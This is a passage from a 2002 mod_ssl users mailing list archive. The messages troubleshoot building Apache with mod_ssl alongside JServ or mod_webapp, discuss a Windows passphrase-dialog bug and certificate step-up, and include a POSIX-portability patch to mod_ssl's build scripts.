it loads JServ that you get with mod_webapp.c and our application works fine. So you might not have to recompile the mod_webapp module with -DEAPI. /will > -----Original Message----- > From: owner-modssl-users@modssl.org > [mailto:owner-modssl-users@modssl.org]On Behalf Of Wes Barris > Sent: Thursday, February 21, 2002 5:21 PM > To: modssl list > Subject: How to install mod_ssl + mod_webapp? > > > We are currently using Jakarta-tomcat-4.0.1 with Apache httpd 1.3.22 > (binary distributions for linux downloaded from the www.apache.org > website). I also have mod_webapp installed (downloaded from the > same website). > > Now, I want to add mod_ssl functionality to this mix. From what I > gather from the www.modssl.org website, I must throw away what I > have and compile from sources in order to use mod_ssl. > > I followed the instructions on this page: > > http://www.modssl.org/example/ > > and everything seemed to build properly. After copying mod_ssl.so to > the new ./libexec directory and adding the following two lines to > ./conf/httpd.conf: > > LoadModule webapp_module libexec/mod_webapp.so > AddModule mod_webapp.c > > I get this error message: > > root@redhat# /usr/local/apache-ssl/bin/apachectl configtest > [Wed Feb 20 15:59:04 2002] [warn] Loaded DSO > libexec/mod_webapp.so uses plain Apache 1.3 API, this module > might crash under EAPI! (please recompile it with -DEAPI) > [Wed Feb 20 15:59:04 2002] [warn] module mod_webapp.c is already > added, skipping > Syntax OK > > I can read the words but I don't really know what to do. It seems > to be saying that I have to compile mod_webapp using -DEAPI. Can > anyone provide some guidance? > > -- > Wes Barris > E-Mail: Wes.Barris@csiro.au > Phone: 07-3346-2504 > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 22 18:07:17 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA16669; Fri, 22 Feb 2002 18:07:09 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from fe030.worldonline.dk id SAA16496; Fri, 22 Feb 2002 18:05:20 +0100 (MET) Received: (qmail 11445 invoked by uid 0); 22 Feb 2002 17:05:14 -0000 Received: from 213.237.13.224.adsl.hc.worldonline.dk (HELO NEIGAARD?MOB) (213.237.13.224) by fe030.worldonline.dk with SMTP; 22 Feb 2002 17:05:14 -0000 Date: Fri, 22 Feb 2002 18:04:17 +0100 From: =?ISO-8859-1?B?U/hyZW4gTmVpZ2FhcmQ=?= X-Mailer: The Bat! (v1.53d) X-Priority: 3 (Normal) Message-ID: <311430076.20020222180417@e-box.dk> To: Thomas Binder CC: modssl-users@modssl.org Subject: Re[2]: How do I check to see if it works? In-Reply-To: <20020221105810.A4273522@ohm.arago.de> References: <1386107842.20020218102849@e-box.dk> <20020220134409.A4000673@ohm.arago.de> <259251402.20020220214639@e-box.dk> <20020221105810.A4273522@ohm.arago.de> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: =?ISO-8859-1?B?U/hyZW4gTmVpZ2FhcmQ=?= X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Thursday, February 21, 2002, 10:58:10 AM, Thomas wrote: TB> How do you run Apache when you want it to support SSL, i.e. which TB> command do you use? You have read mod_ssl's documentation, haven't TB> you? Oh.... Didn't see that one, actually I haven't found it yet in the docs, but I just found "/usr/local/apache/bin/httpd -DSSL" in the examples :) Thx :) -- Med venlig hilsen/Best regards, Søren Neigaard mailto:neigaard@e-box.dk ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 22 19:07:57 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA25562; Fri, 22 Feb 2002 19:06:18 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id TAA25149; Fri, 22 Feb 2002 19:02:24 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 244C44CE674; Fri, 22 Feb 2002 19:02:24 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g1MGApO35951; Fri, 22 Feb 2002 17:10:51 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from digexch1.digarch.com id QAA08719; Fri, 22 Feb 2002 16:48:02 +0100 (MET) Received: from chorazin.digarch.com (CHORAZIN [10.5.1.149]) by digexch1.digarch.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id CWKBKR84; Fri, 22 Feb 2002 09:47:31 -0600 Message-Id: <5.1.0.14.0.20020222094125.00a48250@digexch1> X-Sender: jburgess@digexch1 (Unverified) X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Fri, 22 Feb 2002 09:47:33 -0600 To: modssl-users@modssl.org From: Jay Burgess Subject: SSL-enabled Apache with another module Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Jay Burgess X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I'm struggling to get Apache built on Solaris with both mod_ssl and JServ. I've had no trouble building an SSL-only Apache, and I've had a JServ-only Apache running for a year, but trying to get them both together in Apache together is causing me all kinds of trouble. (Apache starts up fine in SSL mode, but JServ never starts. And, there's no log information of any kind produced.) I've included my complete build script below in case anyone sees anything that doesn't look right. My UNIX skills are marginal at best, so I've built this script with a lot of cut and pasting from online docs, etc. I'm assuming I've got some configure option wrong, but I sure don't see it. Any guidance you can provide would be much appreciated. Thanks in advance. Here's my script: echo "*****************************************************************" echo "[1] Configure and make Apache" echo "*****************************************************************" cd /Apache/1.3.20 CC="/usr/local/bin/gcc" MAKE="/usr/local/bin/gmake" ./configure \ --prefix=/Apache/1.3.20 gmake gmake install echo "*****************************************************************" echo "[2] Configure and build OpenSSL" echo "*****************************************************************" cd /Apache/openssl-0.9.6b sh config no-threads gmake gmake test echo "*****************************************************************" echo "[3] Add mod_ssl to Apache" echo "*****************************************************************" cd /Apache/mod_ssl-2.8.4-1.3.20 ./configure --with-apache=/Apache/1.3.20 echo "*****************************************************************" echo "[4] Configure and make JServ" echo "*****************************************************************" cd /Apache/ApacheJServ-1.1.2 CC="/usr/local/bin/gcc" MAKE="/usr/local/bin/gmake" ./configure \ --prefix=/Apache/ApacheJServ-1.1.2 \ --with-apache-src=/Apache/1.3.20 \ --with-jdk-home=/usr/java1.2 \ --with-JSDK=/Apache/jsdk2.0/lib/jsdk.jar gmake gmake install echo "*****************************************************************" echo "[5] Reconfigure Apache (with JServ and SSL)" echo "*****************************************************************" cd /Apache/1.3.20 CC="/usr/local/bin/gcc" MAKE="/usr/local/bin/gmake" SSL_BASE=/Apache/openssl-0.9.6b ./configure \ --prefix=/Apache/1.3.20 \ --enable-module=ssl \ --enable-shared=ssl \ --activate-module=src/modules/jserv/libjserv.a echo "*****************************************************************" echo "[6] Remake Apache" echo "*****************************************************************" cd /Apache/1.3.20 gmake gmake certificate gmake install Jay ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 22 20:04:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA03092; Fri, 22 Feb 2002 20:03:15 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from blv-smtpout-01.boeing.com id UAA03024; Fri, 22 Feb 2002 20:02:33 +0100 (MET) Received: from stl-av-02.boeing.com ([192.76.190.7]) by blv-smtpout-01.boeing.com (8.9.2/8.8.5-M2) with ESMTP id LAA19351 for ; Fri, 22 Feb 2002 11:02:31 -0800 (PST) Received: from blv-hub-01.boeing.com (localhost [127.0.0.1]) by stl-av-02.boeing.com (8.9.3/8.9.2/MBS-AV-01) with ESMTP id NAA15761 for ; Fri, 22 Feb 2002 13:02:30 -0600 (CST) Received: from slopok.roses.bna.boeing.com (slopok.roses.bna.boeing.com [141.102.33.160]) by blv-hub-01.boeing.com (8.11.3/8.11.3/MBS-LDAP-01) with ESMTP id g1MJ2m127842 for ; Fri, 22 Feb 2002 11:02:48 -0800 (PST) Received: from roses.bna.boeing.com (thorny [141.102.34.157]) by slopok.roses.bna.boeing.com (8.10.1/8.10.1) with ESMTP id g1MJ2QG06065 for ; Fri, 22 Feb 2002 11:02:28 -0800 (PST) Message-ID: <3C7695C2.45219FCA@roses.bna.boeing.com> Date: Fri, 22 Feb 2002 11:02:26 -0800 From: Carlos Ramirez Organization: Boeing - Human Space Flight & Exploration X-Mailer: Mozilla 4.73 [en] (X11; U; SunOS 5.5.1 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: SSL-enabled Apache with another module References: <5.1.0.14.0.20020222094125.00a48250@digexch1> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Carlos Ramirez X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Verify that you actually do have Jserv built into your httpd. You can either execute: /Apache/1.3.20/bin/httpd -l or look at your server signature which should look something like this: Apache/1.3.22 (Unix) ApacheJServ/1.1.2 mod_perl/1.26 mod_ssl/2.8.5 OpenSSL/0.9.6c Have you included the path to your jserv.conf file in your httpd.conf? Your httpd.conf file should include the following line: Include /usr/local/etc/jserv1.1.2/etc/jserv.conf The only difference between my build process and yours is that I don't do the shared thing i.e. I don't include the --enable-shared=ssl hhmmm...somehow this didn't feel like modssl related... -Carlos Jay Burgess wrote: > > I'm struggling to get Apache built on Solaris with both mod_ssl and > JServ. I've had no trouble building an SSL-only Apache, and I've had a > JServ-only Apache running for a year, but trying to get them both together > in Apache together is causing me all kinds of trouble. (Apache starts up > fine in SSL mode, but JServ never starts. And, there's no log information > of any kind produced.) > > I've included my complete build script below in case anyone sees anything > that doesn't look right. My UNIX skills are marginal at best, so I've > built this script with a lot of cut and pasting from online docs, etc. I'm > assuming I've got some configure option wrong, but I sure don't see it. > > Any guidance you can provide would be much appreciated. Thanks in advance. > > Here's my script: > > echo "*****************************************************************" > echo "[1] Configure and make Apache" > echo "*****************************************************************" > cd /Apache/1.3.20 > CC="/usr/local/bin/gcc" MAKE="/usr/local/bin/gmake" ./configure \ > --prefix=/Apache/1.3.20 > gmake > gmake install > > echo "*****************************************************************" > echo "[2] Configure and build OpenSSL" > echo "*****************************************************************" > cd /Apache/openssl-0.9.6b > sh config no-threads > gmake > gmake test > > echo "*****************************************************************" > echo "[3] Add mod_ssl to Apache" > echo "*****************************************************************" > cd /Apache/mod_ssl-2.8.4-1.3.20 > ./configure --with-apache=/Apache/1.3.20 > > echo "*****************************************************************" > echo "[4] Configure and make JServ" > echo "*****************************************************************" > cd /Apache/ApacheJServ-1.1.2 > CC="/usr/local/bin/gcc" MAKE="/usr/local/bin/gmake" ./configure \ > --prefix=/Apache/ApacheJServ-1.1.2 \ > --with-apache-src=/Apache/1.3.20 \ > --with-jdk-home=/usr/java1.2 \ > --with-JSDK=/Apache/jsdk2.0/lib/jsdk.jar > gmake > gmake install > > echo "*****************************************************************" > echo "[5] Reconfigure Apache (with JServ and SSL)" > echo "*****************************************************************" > cd /Apache/1.3.20 > CC="/usr/local/bin/gcc" MAKE="/usr/local/bin/gmake" > SSL_BASE=/Apache/openssl-0.9.6b ./configure \ > --prefix=/Apache/1.3.20 \ > --enable-module=ssl \ > --enable-shared=ssl \ > --activate-module=src/modules/jserv/libjserv.a > > echo "*****************************************************************" > echo "[6] Remake Apache" > echo "*****************************************************************" > cd /Apache/1.3.20 > gmake > gmake certificate > gmake install > > Jay > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org -- ------------------------------------------------------------------------- Carlos Ramirez + Boeing + Human Flight & Space Exploration + 714.372.4181 ------------------------------------------------------------------------- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 22 20:32:10 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA06362; Fri, 22 Feb 2002 20:30:05 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from hotmail.com id UAA06184; Fri, 22 Feb 2002 20:28:19 +0100 (MET) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Fri, 22 Feb 2002 11:16:39 -0800 Received: from 156.153.255.236 by lw11fd.law11.hotmail.msn.com with HTTP; Fri, 22 Feb 2002 19:16:39 GMT X-Originating-IP: [156.153.255.236] From: "Edward Wong" To: modssl-users@modssl.org Subject: Re: Apache/2.0.32 (Win32) mod_ssl/3.0a0 OpenSSL/0.9.6c - passphrase problem Date: Fri, 22 Feb 2002 11:16:39 -0800 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 22 Feb 2002 19:16:39.0773 (UTC) FILETIME=[745C78D0:01C1BBD5] Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Edward Wong" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I encountered the same problem in Windows2000 (w/all the rest being the same as you). Has this bug been officially submitted? >From: "Henri Hennebert" >Reply-To: modssl-users@modssl.org >To: >Subject: Apache/2.0.32 (Win32) mod_ssl/3.0a0 OpenSSL/0.9.6c - passphrase >problem >Date: Fri, 22 Feb 2002 14:46:57 +0100 > >Hello everyone > >I encounter a problem with the passphrase in mod_ssl on WinXP. > >If I use the builtin passphrase dialog: >SSLPassPhraseDialog buildin > >When I start apache2 from a cmd box: >Apache -DSSL start > >I'm prompted for the passphrase when the first process start. > >When the second process start, the prompt don't come and the >process start an infinite loop asking somewhere for the passphrase. > >I change from builtin to exec: >SSLPassPhraseDialog exec:/workbench/apache2/bin/passphrase.exe > >And all run smoothly. > >Henri >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org _________________________________________________________________ Join the world’s largest e-mail service with MSN Hotmail. http://www.hotmail.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Feb 23 14:53:23 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA15873; Sat, 23 Feb 2002 14:52:38 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id OAA15732; Sat, 23 Feb 2002 14:51:34 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id C98554CE750; Sat, 23 Feb 2002 14:51:30 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g1N8xmY51738; Sat, 23 Feb 2002 09:59:48 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from localhost id JAA00983; Sat, 23 Feb 2002 09:14:13 +0100 (MET) Date: Sat, 23 Feb 2002 09:14:13 +0100 (MET) Message-Id: <200202230814.JAA00983@opensource.ee.ethz.ch> From: modssl-bugdb@modssl.org To: modssl-users@modssl.org Subject: [BugDB] mod_ssl port to POSIX 1003.1-2001 hosts (PR#665) Cc: modssl-bugdb@modssl.org X-Loop: modssl-bugdb@modssl.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: modssl-bugdb@modssl.org X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Full_Name: Paul Eggert Version: 2.8.6 OS: Submission from: (NULL) (209.55.111.154) The new POSIX standard is now official (IEEE Std 1003.1-2001), and it has removed support for some obsolete utility options that modssl uses. Basically, the new POSIX has removed digit-string options (e.g., "tail -1") and options beginning with "+" (e.g., "sort +1"). I'm using an experimental environment that insists on the new standard, so I tend to run into these problems before other people do. Here is a proposed patch to modssl to port it to POSIX 1003.1-2001 hosts. 2002-02-23 Paul Eggert * pkg.sslmod/ssl_engine_dh.c: expand -8 -> expand * pkg.eapi/eapi.patch, pkg.sslmod/libssl.module: tail -1 -> sed -n '$p' =================================================================== RCS file: pkg.eapi/eapi.patch,v retrieving revision 2.8.6.0 retrieving revision 2.8.6.1 diff -pu -r2.8.6.0 -r2.8.6.1 --- pkg.eapi/eapi.patch 2002/02/01 14:09:49 2.8.6.0 +++ pkg.eapi/eapi.patch 2002/02/23 08:07:08 2.8.6.1 @@ -79,7 +79,7 @@ Index: src/Configure + esac + # MM Shared Memory Library support for EAPI + if [ "x$EAPI_MM" = "x" ]; then -+ EAPI_MM=`egrep '^EAPI_MM=' $file | tail -1 | awk -F= '{print $2}'` ++ EAPI_MM=`egrep '^EAPI_MM=' $file | sed -n '$p' | awk -F= '{print $2}'` + fi + if [ "x$EAPI_MM" != "x" ]; then + case $EAPI_MM in =================================================================== RCS file: pkg.sslmod/libssl.module,v retrieving revision 2.8.6.0 retrieving revision 2.8.6.1 diff -pu -r2.8.6.0 -r2.8.6.1 --- pkg.sslmod/libssl.module 2001/05/20 09:13:47 2.8.6.0 +++ pkg.sslmod/libssl.module 2002/02/23 08:07:08 2.8.6.1 @@ -282,7 +282,7 @@ ConfigStart # determine SSL_BASE # if [ ".$SSL_BASE" = . ]; then - SSL_BASE=`egrep '^SSL_BASE=' $file | tail -1 | awk -F= '{print $2}'` + SSL_BASE=`egrep '^SSL_BASE=' $file | sed -n '$p' | awk -F= '{print $2}'` if [ ".$SSL_BASE" = . ]; then if [ -d /usr/local/ssl ]; then SSL_BASE="/usr/local/ssl" =================================================================== RCS file: pkg.sslmod/ssl_engine_dh.c,v retrieving revision 2.8.6.0 retrieving revision 2.8.6.1 diff -pu -r2.8.6.0 -r2.8.6.1 --- pkg.sslmod/ssl_engine_dh.c 2001/08/07 18:20:57 2.8.6.0 +++ pkg.sslmod/ssl_engine_dh.c 2002/02/23 08:07:08 2.8.6.1 @@ -227,10 +227,10 @@ $dhinfo = "\n\/\*\n$dhinfo\*\/\n\n"; # generate C source from DH params my $dhsource = ''; -open(FP, "openssl dh -noout -C -in dh512.pem | indent | expand -8 |") || die; +open(FP, "openssl dh -noout -C -in dh512.pem | indent | expand |") || die; $dhsource .= $_ while (); close(FP); -open(FP, "openssl dh -noout -C -in dh1024.pem | indent | expand -8 |") || die; +open(FP, "openssl dh -noout -C -in dh1024.pem | indent | expand |") || die; $dhsource .= $_ while (); close(FP); $dhsource =~ s|(DH\s+\*get_dh)|static $1|sg; ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Feb 23 14:53:29 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA15884; Sat, 23 Feb 2002 14:52:43 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id OAA15733; Sat, 23 Feb 2002 14:51:34 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id A9E2A4CE744; Sat, 23 Feb 2002 14:51:30 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g1N8w9651714; Sat, 23 Feb 2002 09:58:09 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from vonemailsweep1.voneaccount.com id WAA21255; Fri, 22 Feb 2002 22:50:56 +0100 (MET) Received: from vonewpnotes (unverified) by vonemailsweep1.voneaccount.com (Content Technologies SMTPRS 4.2.5) with ESMTP id for ; Fri, 22 Feb 2002 21:52:06 +0000 Subject: Re: Global ID for IE 5.0 NN 4.5 on Win98 dosen't works To: modssl-users@modssl.org Date: Fri, 22 Feb 2002 21:50:47 GMT Message-ID: From: mike.innes@Oneaccount.com X-Priority: 3 (Normal) X-MIMETrack: Serialize by Router on VirginOneAcc_2/Virgin Direct/GB(Release 5.0 (Intl)|30 March 1999) at 02/22/2002 09:50:50 PM MIME-Version: 1.0 Content-type: text/plain; charset="us-ascii" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: mike.innes@Oneaccount.com X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Pablo, Did you make the server cerificate yourself? Assuming you flagged it for IE and NC global_id if so then the browser will only step-up to strong (128bit) encryption if the certificate that signed it is also in the browser and has been flagged as a server-gated CA certificate, if you import the CA certificate into your browser then it will lose the server-gated flag. AFAIK the only way to flag a CA certificate as server-gated is to run a patching program after installing the CA certificate into the browser (IE dev kit?). There's some more info in the MOD_SSL docs about this. If you bought the GLOBAL_ID certificate (from Verisign/thawte etc) but it does not step up then the most likely thing is that you have not installed an intermediate CA certificate into Apache/MOD_SSL, this is a common mistake - also note this is the SSLCertificateChainFile directive. The reason why your Linux 4.75 gives strong encryption is probably because it is not encryption crippled (Help... About Communicator, does is say "This version supports U.S. security" and you won't get 40bit unless you turn off the ciphers in the browser or server. Mikey Pablo Silva on 21/02/2002 19:42:44 Please respond to modssl-users@modssl.org To: modssl-users@modssl.org cc: Subject: Global ID for IE 5.0 NN 4.5 on Win98 dosen't works Hi All! I've tested a web site connection www.magnetenterprises.com with Netscape Navigator version 4.5 and IE 5.0 on win98, both browsers show me 128 bits connection without erros. I have a doubt with my certificate, I made a GLOBAL_ID certificate for my web site, but ... , when I test with Netscape Navigator 4.5 and IE 5.0 both on windows 98, only connect by 40 bits :-( My web site is on Apache + Linux Suse 7.1 Professional when I connect by Netscape Navigator version 4.75 on Linux, I can see a 128 bits .., but when I test with NN or IE on win98 only I can get 40 bits conecctions.. I don't know what happens, is necesary configurate some directive for to obligate a 128 bits conecctions for both browsers NN and IE in Apache? How I must to do it? Thanks in advance Greetings from Chile. -Pablo __________________________________________________ Do You Yahoo!? Yahoo! Sports - Coverage of the 2002 Olympic Games http://sports.yahoo.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org All telephone calls are recorded and may be monitored. E-mail communication is not secure and may be intercepted by a third party. This message is confidential to the intended addressee. If you are not the intended addressee, please inform us immediately and then delete this message. Virgin One account does not accept responsibility for changes made to this message after it was sent. Although Virgin One account believes this e-mail is free of any virus or other defect which may affect a computer, it is the responsibility of the recipient to ensure that it is virus free and Virgin One account does not accept any responsibility for any loss or damage arising from its use. The Virgin One account is a secured personal bank account with The Royal Bank of Scotland plc administered by Virgin Direct Personal Finance Ltd. It is an Introducer representative only of Virgin Money Personal Financial Service Ltd, which is authorised by the Financial Services Authority for life insurance, pension and unit trust business and represents only the Virgin Money marketing group. Registered office: Waterhouse Square, 138-142 Holborn, London EC1N 2TH, UK. Registered in England no 3414708. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Feb 23 14:53:36 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA15895; Sat, 23 Feb 2002 14:52:51 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id OAA15725; Sat, 23 Feb 2002 14:51:32 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 9B9144CE739; Sat, 23 Feb 2002 14:51:30 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g1N8w6f51708; Sat, 23 Feb 2002 09:58:06 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from digexch1.digarch.com id WAA18495; Fri, 22 Feb 2002 22:27:11 +0100 (MET) Received: from chorazin.digarch.com (CHORAZIN [10.5.1.149]) by digexch1.digarch.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id CWKBKSG9; Fri, 22 Feb 2002 15:26:41 -0600 Message-Id: <5.1.0.14.0.20020222151930.00a48610@digexch1> X-Sender: jburgess@digexch1 (Unverified) X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Fri, 22 Feb 2002 15:26:44 -0600 To: modssl-users@modssl.org From: Jay Burgess Subject: RE: SSL-enabled Apache with another module Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Jay Burgess X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Thanks for the reply. I did forget to mention in my previous post that mod_jserv.c appears to be correctly compiled into Apache (as shown via "httpd -l"). I'll re-check the server signature in a few minutes, after my latest rebuild completes. With regards to the configuration details, I don't believe that there are any problems there, as Apache+JServ has worked fine for me almost a year now. I only started having trouble when I tried to incorporate mod_ssl into the build process. Funnily enough, if I build Apache+mod_ssl, without JServ, that also works fine. It's only the combination of the three that isn't working. I'll re-look at the "--enable-shared=ssl" difference that you mention, and see if maybe that's it. Finally, I do now think it's a JServ problem, not a mod_ssl issue. I just needed to start somewhere, and since mod_ssl was the new piece of the puzzle, I was looking for confirmation from a mod_ssl user that I appeared to be doing it right. Thanks again. Jay > -----Original Message----- > From: Carlos Ramirez [mailto:ramirezc@roses.bna.boeing.com] > Sent: Friday, February 22, 2002 1:02 PM > To: modssl-users@modssl.org > Subject: Re: SSL-enabled Apache with another module > > > Verify that you actually do have Jserv built into your httpd. You can > either execute: /Apache/1.3.20/bin/httpd -l or look at your server > signature which should look something like this: > Apache/1.3.22 (Unix) ApacheJServ/1.1.2 mod_perl/1.26 mod_ssl/2.8.5 > OpenSSL/0.9.6c > > Have you included the path to your jserv.conf file in your httpd.conf? > Your httpd.conf file should include the following line: > Include /usr/local/etc/jserv1.1.2/etc/jserv.conf > > The only difference between my build process and yours is that I don't > do the shared thing i.e. I don't include the --enable-shared=ssl > > hhmmm...somehow this didn't feel like modssl related... > > -Carlos > > Jay Burgess wrote: > > > > I'm struggling to get Apache built on Solaris with both mod_ssl and > > JServ. I've had no trouble building an SSL-only Apache, > and I've had a > > JServ-only Apache running for a year, but trying to get > them both together > > in Apache together is causing me all kinds of trouble. > (Apache starts up > > fine in SSL mode, but JServ never starts. And, there's no > log information > > of any kind produced.) > > > > I've included my complete build script below in case anyone > sees anything > > that doesn't look right. My UNIX skills are marginal at > best, so I've > > built this script with a lot of cut and pasting from online > docs, etc. I'm > > assuming I've got some configure option wrong, but I sure > don't see it. > > > > Any guidance you can provide would be much appreciated. > Thanks in advance. > > > > Here's my script: > > > > echo > "*****************************************************************" > > echo "[1] Configure and make Apache" > > echo > "*****************************************************************" > > cd /Apache/1.3.20 > > CC="/usr/local/bin/gcc" MAKE="/usr/local/bin/gmake" ./configure \ > > --prefix=/Apache/1.3.20 > > gmake > > gmake install > > > > echo > "*****************************************************************" > > echo "[2] Configure and build OpenSSL" > > echo > "*****************************************************************" > > cd /Apache/openssl-0.9.6b > > sh config no-threads > > gmake > > gmake test > > > > echo > "*****************************************************************" > > echo "[3] Add mod_ssl to Apache" > > echo > "*****************************************************************" > > cd /Apache/mod_ssl-2.8.4-1.3.20 > > ./configure --with-apache=/Apache/1.3.20 > > > > echo > "*****************************************************************" > > echo "[4] Configure and make JServ" > > echo > "*****************************************************************" > > cd /Apache/ApacheJServ-1.1.2 > > CC="/usr/local/bin/gcc" MAKE="/usr/local/bin/gmake" ./configure \ > > --prefix=/Apache/ApacheJServ-1.1.2 \ > > --with-apache-src=/Apache/1.3.20 \ > > --with-jdk-home=/usr/java1.2 \ > > --with-JSDK=/Apache/jsdk2.0/lib/jsdk.jar > > gmake > > gmake install > > > > echo > "*****************************************************************" > > echo "[5] Reconfigure Apache (with JServ and SSL)" > > echo > "*****************************************************************" > > cd /Apache/1.3.20 > > CC="/usr/local/bin/gcc" MAKE="/usr/local/bin/gmake" > > SSL_BASE=/Apache/openssl-0.9.6b ./configure \ > > --prefix=/Apache/1.3.20 \ > > --enable-module=ssl \ > > --enable-shared=ssl \ > > --activate-module=src/modules/jserv/libjserv.a > > > > echo > "*****************************************************************" > > echo "[6] Remake Apache" > > echo > "*****************************************************************" > > cd /Apache/1.3.20 > > gmake > > gmake certificate > > gmake install > > > > Jay > > > ______________________________________________________________________ > > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org -- ------------------------------------------------------------------------- Carlos Ramirez + Boeing + Human Flight & Space Exploration + 714.372.4181 ------------------------------------------------------------------------- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Feb 23 14:53:42 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA15931; Sat, 23 Feb 2002 14:53:08 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id OAA15720; Sat, 23 Feb 2002 14:51:31 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 796C34CE718; Sat, 23 Feb 2002 